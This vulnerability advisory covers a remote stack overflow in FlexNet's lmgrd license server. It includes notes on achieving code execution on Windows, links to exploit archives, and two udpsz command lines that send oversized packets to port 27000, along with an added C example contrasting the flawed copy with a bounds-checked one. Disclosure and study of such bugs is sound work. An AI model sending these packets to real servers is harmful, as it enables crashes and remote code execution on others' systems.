FlexNet License Server Manager Stack Overflow In lmgrd

Description

#######################################################################
Luigi Auriemma
Application: FlexNet License Server Manager
http://www.flexerasoftware.com/products/flexnet-publisher.htm
http://www.globes.com/support/fnp_utilities_download.htm
Versions: <= 11.9.1 and others earlier (this version number was
written when I found the advisory many months/years ago)
Platforms: AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris
Bug: stack overflow in lmgrd
Exploitation: remote, versus server
Date: found 26 Oct 2010
fixed 26 Mar 2012
advisory 13 May 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
"FlexNet Publisher software licensing makes it easy for software
vendors and high-tech manufacturers to manage, secure, enhance, and
grow market share through flexible pricing, packaging, licensing, and
protection of their software and SaaS offerings."
#######################################################################
======
2) Bug
======
lmgrd is a license server manager listening on port 27000 and usually
running as a system service in the products of various vendors such as IBM,
HP, Sybase, Citrix, VMware, SolidWorks and so on; it is simply the most
widespread license manager.
There is also another version of the license server, called lmadmin, that
includes a web interface and is NOT vulnerable, but it is not as widespread
as lmgrd.
The server is affected by a classic stack buffer overflow in the
function that copies the data received after the header into a buffer
smaller than the number of bytes needed.
On Windows, code execution takes place after the exception in
"REP MOVSD", bypassing the "stack canary" protection.
For example, on this platform [ESP+8] points exactly at position
0x3718 of our data, so we can place a jmp back there and execute the
shellcode placed before that position.
Running the software requires a license file, so for quick testing
create the folder c:\flexlm, put lmgrd.exe in it, then create the file
license.dat containing the following data and launch it (I suggest
using -z to launch it in the foreground):
SERVER this_host ANY
VENDOR SYBASE
# The Sybase Software Asset Management License Server will not start unless
# one valid license is present. The following license is not used but will
# allow the License Server to start in the absence of any other licenses.
# Once you have generated served licenses for this License Server at SPDC
# you should remove this license file.
#
INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \
Inc." ISSUED=14-feb-2007 NOTICE="License to allow the SySAM \
License Server to start in the absence of any other licenses." \
SN=12727 SIGN2="075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \
A310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \
499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A"
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18877.zip
udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000
or the max
udpsz -D -T -C "2f b7 1179 ffff 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0xffff
Note that the 8-bit value at offset 1 and the 16-bit one at offset 2 are
checksums calculated respectively over the 20-byte header and over the rest
of the data, so they must be set correctly if the packet is modified.
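The copy described in section 2, reduced to its bug class as an added illustration (a constructed example, not lmgrd's code or the vendor's fix): the unchecked copy of the post-header data into a fixed stack buffer, beside the hardened form that rejects a declared length larger than that buffer or than the bytes actually received. It assumes a big-endian 16-bit body length at header offsets 4-5, inferred from the "4000"/"ffff" fields in the command lines above; the checksum bytes are copied from the first command line and not recomputed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define HDR_LEN  20     /* header size stated in the advisory */
#define BODY_MAX 1024   /* constructed: capacity of the fixed stack buffer in this example */

/* Assumption: big-endian 16-bit body length at header offsets 4-5, inferred from the
   "4000"/"ffff" fields in the udpsz command lines; lmgrd's real layout is not on the page. */
uint16_t declared_len(const uint8_t *pkt) {
    return (uint16_t)((pkt[4] << 8) | pkt[5]);
}

/* The bug class: the declared length is trusted, so the copy runs past the fixed buffer
   whenever it exceeds the buffer's capacity. Kept only for contrast; not called here. */
void copy_body_unchecked(const uint8_t *pkt, uint8_t *body) {
    memcpy(body, pkt + HDR_LEN, declared_len(pkt));
}

/* Hardened form: validate before copying. Returns bytes copied, or -1 if rejected. */
int copy_body_checked(const uint8_t *pkt, size_t pkt_len, uint8_t *body, size_t body_cap) {
    if (pkt == NULL || body == NULL || pkt_len < HDR_LEN) return -1;
    size_t len = declared_len(pkt);
    if (len > body_cap) return -1;            /* the missing bound: destination capacity */
    if (len > pkt_len - HDR_LEN) return -1;   /* declares more bytes than were received */
    memcpy(body, pkt + HDR_LEN, len);
    return (int)len;
}

/* Constructed packet: 20-byte header whose first four bytes mirror the advisory's first
   command line (checksums not recomputed), followed by body_bytes of 'a' (0x61). */
size_t build_packet(uint8_t *out, size_t cap, uint16_t declared, size_t body_bytes) {
    if (cap < HDR_LEN + body_bytes) return 0;
    memset(out, 0, HDR_LEN);
    out[0] = 0x2f; out[1] = 0x24; out[2] = 0x18; out[3] = 0x9d;
    out[4] = (uint8_t)(declared >> 8); out[5] = (uint8_t)(declared & 0xff);
    memset(out + HDR_LEN, 0x61, body_bytes);
    return HDR_LEN + body_bytes;
}

/* Feed one constructed packet through the checked copy into a BODY_MAX stack buffer. */
int demo(uint16_t declared, size_t body_bytes) {
    uint8_t pkt[HDR_LEN + 4096];
    uint8_t body[BODY_MAX];
    size_t n = build_packet(pkt, sizeof pkt, declared, body_bytes);
    if (n == 0) return -2;
    return copy_body_checked(pkt, n, body, sizeof body);
}
```

A packet declaring 0x4000 body bytes, like the first command line, is rejected by the checked copy before any byte reaches the stack buffer.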
#######################################################################
======
4) Fix
======
Fixed.
#######################################################################
